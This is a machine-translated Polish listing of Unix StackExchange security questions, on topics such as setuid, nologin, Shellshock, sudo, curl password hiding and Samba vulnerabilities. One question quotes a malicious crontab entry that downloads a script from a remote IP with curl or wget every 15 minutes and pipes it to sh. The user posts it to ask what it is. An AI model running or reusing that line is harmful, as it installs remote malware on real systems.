Pytania otagowane jako security

Niezbędne treści związane z bezpieczeństwem komputerowym, tj. Treści dotyczące zasad, mechanizmów itp. Zapewniają, że dane nie wyciekają ani nie są uszkodzone, a usługi są dostępne we wszystkich okolicznościach.


8
Zezwalaj na setuid w skryptach powłoki
setuidNieco pozwolenie mówi Linux do uruchomienia programu z efektywnym id użytkownika właściciela zamiast wykonawcy: > cat setuid-test.c #include <stdio.h> #include <unistd.h> int main(int argc, char** argv) { printf("%d", geteuid()); return 0; } > gcc -o setuid-test setuid-test.c > ./setuid-test 1000 > sudo chown nobody ./setuid-test; sudo chmod +s ./setuid-test > …

8
Jaka jest różnica między / sbin / nologin a / bin / false
Technicznie, chyba że pamjest skonfigurowany do sprawdzania powłoki, pam_shellsżadna z nich nie może faktycznie uniemożliwić zalogowania się, jeśli nie jesteś w powłoce. W moim systemie mają nawet różne rozmiary, więc podejrzewam, że faktycznie coś robią. Jaka jest różnica? dlaczego oboje istnieją? Dlaczego miałbym używać jednego nad drugim? -rwxr-xr-x 1 root …
169 shell  security  login 


2
Kiedy wprowadzono błąd shellshock (CVE-2014-6271 / 7169) i jaka łatka go w pełni naprawia?
Trochę kontekstu na temat błędu: CVE-2014-6271 Bash obsługuje eksportowanie nie tylko zmiennych powłoki, ale także funkcji powłoki do innych instancji bash, poprzez środowisko procesowe do (pośrednich) procesów potomnych. Obecne wersje bash używają zmiennej środowiskowej nazwanej nazwą funkcji i definicji funkcji rozpoczynającej się od „() {” w wartości zmiennej do propagowania …

8
Jaki jest najbezpieczniejszy sposób uzyskania uprawnień roota: sudo, su lub login?
Chciałbym mieć konto root bezpiecznie, nawet jeśli mój nieuprzywilejowany użytkownik jest zagrożony. W systemie Ubuntu domyślnie można używać sudo tylko ze względów bezpieczeństwa. Nie jestem jednak pewien, czy jest to bezpieczniejsze niż logowanie przy użyciu konsoli tekstowej. Jest zbyt wiele rzeczy, które mogą pójść nie tak, jeśli osoba atakująca może …
120 security  sudo  login  su  privileges 



3
Dlaczego po wprowadzeniu błędnego hasła występuje duże opóźnienie?
Dostrzegam dziwną (według mnie) rzecz dotyczącą haseł. Na przykład, jeśli wprowadzę nieprawidłowe hasło podczas logowania, nastąpi kilka sekund opóźnienia, zanim system mi o tym powie. Gdy próbuję sudoużyć niepoprawnego hasła, musiałbym również poczekać, aż powłoka powie „Przepraszam, spróbuj ponownie”. Zastanawiam się, dlaczego tak długo „rozpoznaje się” nieprawidłowe hasło? Zostało to …

1
Chrome: żądania DNS z losowymi nazwami DNS: złośliwe oprogramowanie?
Przez lata (od 2005 r.) Widziałem dzienniki dziwnych losowych żądań DNS wykonanych na wielu serwerach DNS / BIND, które prowadziłem. May 7 12:13:50 1.1.1.1 named[63742]: client 1.1.1.2#24123 (verxkgiicjmcnxg): view internal: query: verxkgiicjmcnxg IN A + (1.1.1.1) May 7 12:13:50 1.1.1.1 named[63742]: client 1.1.1.2#29159 (epqoaqsayo): view internal: query: epqoaqsayo IN A …
88 security  dns  chrome 




8
Czy / usr / sbin / nologin jako powłoka logowania służy celowi bezpieczeństwa?
W moim /etc/passwdpliku widzę, że www-dataużytkownik używany przez Apache, a także różnego rodzaju użytkownicy systemu, mają powłokę logowania jako /usr/sbin/nologinlub /bin/false. Na przykład oto wybór linii: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin games:x:5:60:games:/usr/games:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin syslog:x:101:104::/home/syslog:/bin/false whoopsie:x:109:116::/nonexistent:/bin/false mark:x:1000:1000:mark,,,:/home/mark:/bin/bash W związku z tym, jeśli spróbuję zamienić się na któregokolwiek z tych użytkowników (co czasami chciałbym …
76 shell  security  users  login 

2
Przypadkowo wpisałem hasło w polu logowania, czy nadal jest bezpieczne?
Patrzyłem na klawiaturę i wpisałem hasło, ponieważ myślałem, że już wpisałem swoją nazwę użytkownika. Nacisnąłem Enter, a kiedy zapytałem o hasło, nacisnąłem Ctrl+ c. Czy powinienem podjąć środki ostrożności, aby upewnić się, że hasło nie jest gdzieś zapisane jako zwykły tekst, czy powinienem je zmienić? To też było na tty …


2
„WannaCry” w systemach Linux: jak się zabezpieczyć?
Zgodnie z artykułem rapid7 istnieje kilka wrażliwych wersji Samby umożliwiających zdalne wykonanie kodu w systemach Linux: Podczas gdy ransomworm WannaCry wpłynął na systemy Windows i był łatwy do zidentyfikowania, przy wyraźnych krokach naprawczych, luka w Sambie wpłynie na systemy Linux i Unix i może stanowić poważne techniczne przeszkody w uzyskaniu …

7
Jak mogę monitorować wszystkie wychodzące żądania / połączenia z mojego komputera?
Moja maszyna jest serwerem, więc chcę zignorować połączenia z moim serwerem (np. Gdy ktoś odwiedza moją stronę internetową). Chcę, aby mój serwer wysyłał tylko połączenia / żądania do innych miejsc. Jak wyświetlić tylko te połączenia wychodzące? EDYCJA: Jestem nowy w tego typu rzeczach. Próbuję tylko sprawdzić, czy wysyłane są cokolwiek …

3
W jaki sposób curl chroni hasło przed pojawieniem się na wyjściu ps?
Jakiś czas temu zauważyłem, że nazwy użytkowników i hasła podane curljako argumenty wiersza poleceń nie pojawiają się w psdanych wyjściowych (chociaż oczywiście mogą pojawiać się w twojej historii bashów). Podobnie nie pojawiają się w /proc/PID/cmdline. (Można jednak określić długość połączonego argumentu nazwa użytkownika / hasło.) Pokaz poniżej: [root@localhost ~]# nc …

18
Dostęp root, który nie może zmienić hasła roota?
Mamy mały problem na serwerze. Chcemy, aby niektórzy użytkownicy mogli np. Być sudorootem, ale z zastrzeżeniem, że użytkownik nie może zmienić hasła roota. Oznacza to, że nadal możemy zalogować się na tym serwerze i zostać rootem bez względu na to, co zrobią inni użytkownicy. Czy to jest możliwe?
66 ubuntu  security  sudo 


2
Czy bezpiecznie jest wydać mój klucz publiczny SSH do pracy?
Obecnie pracuję zdalnie dla wielu organizacji, które wymagają regularnego uzyskiwania dostępu do swoich serwerów w celu konserwacji i aktualizacji. Czy mogę bezpiecznie dodać mój publiczny klucz SSH RSA do .ssh/authorized_keyspliku, aby umożliwić mi znacznie szybsze logowanie / bez konieczności wyszukiwania haseł? Działam przy założeniu, że wygenerowanie klucza prywatnego z klucza …

4
Przeniesienie / var, / home do oddzielnej partycji
Po przeczytaniu tego przewodnika próbuję przenieść niektóre foldery (takie jak /vari /home) na osobną partycję: 3.2.1 Wybierz inteligentny schemat partycji Udało mi się przenieść jeden folder z powodzeniem zgodnie z tym przewodnikiem. Jednak wydaje się, że to nie działa w przypadku wielu folderów, a wszystkie moje foldery są zrzucane na …

2
Podejrzany wpis w crontabie uruchamiający „xribfa4” co 15 minut
Chciałem dodać coś do mojego głównego pliku crontab na moim Raspberry Pi i znalazłem wpis, który wydaje mi się podejrzany, szukając części tego w Google nic nie znalazłem. Wpis Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Zawartość http://103.219.112.66:8000/i.shto: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir …
59 security  cron  malware 

2
Co oznacza opcja Chromium `--no-sandbox`?
Używam Chromium tak: chromium --no-sandbox Robię to, ponieważ uruchamiam Debian Squeeze na kontenerze VM OpenVZ i jest to jedyny sposób, w jaki mogę go uruchomić. Chociaż wciąż czytam, to jest okropne . Ale chcę wiedzieć, dlaczego dokładnie. Czy ktoś może mi to wytłumaczyć? Czy ktoś musi włamać się do komputera, …


5
Mutt: jak bezpiecznie przechowywać hasło?
Mój plik .muttrc wygląda coś jak ten jeden lub zobacz poniżej spojrzenie. Waham się z hasłem. Jak przechowywać hasło, aby z niego korzystać mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real Name"
52 security  mutt 

3
Konwertuj klucz Amazon .pem na Putty .ppk klucz Linux
Wygenerowałem i pobrałem .pemklucz prywatny z AWS. Jednak aby użyć Putty do połączenia z maszyną wirtualną, muszę mieć ten klucz w .ppkformacie. Proces konwersji opisano szczegółowo w około 20 wierszach: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Używam Linux Mint (dystrybucja Ubuntu) i wiem, że mogę używać puttygen w terminalu. Nie mam jednak pojęcia, jak korzystać …

2
Jak rozpoznać proces, który nie ma pid?
Mam proces, który nasłuchuje 2 portów: 45136 / tcp i 37208 / udp (w rzeczywistości zakładam, że jest to ten sam proces). Ale netstat nie zwraca żadnego pid: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - Ten sam wynik z „grep 37208”. Próbowałem też lsof: lsof …


Korzystając z naszej strony potwierdzasz, że przeczytałeś(-aś) i rozumiesz nasze zasady używania plików cookie i zasady ochrony prywatności.
Licensed under cc by-sa 3.0 with attribution required.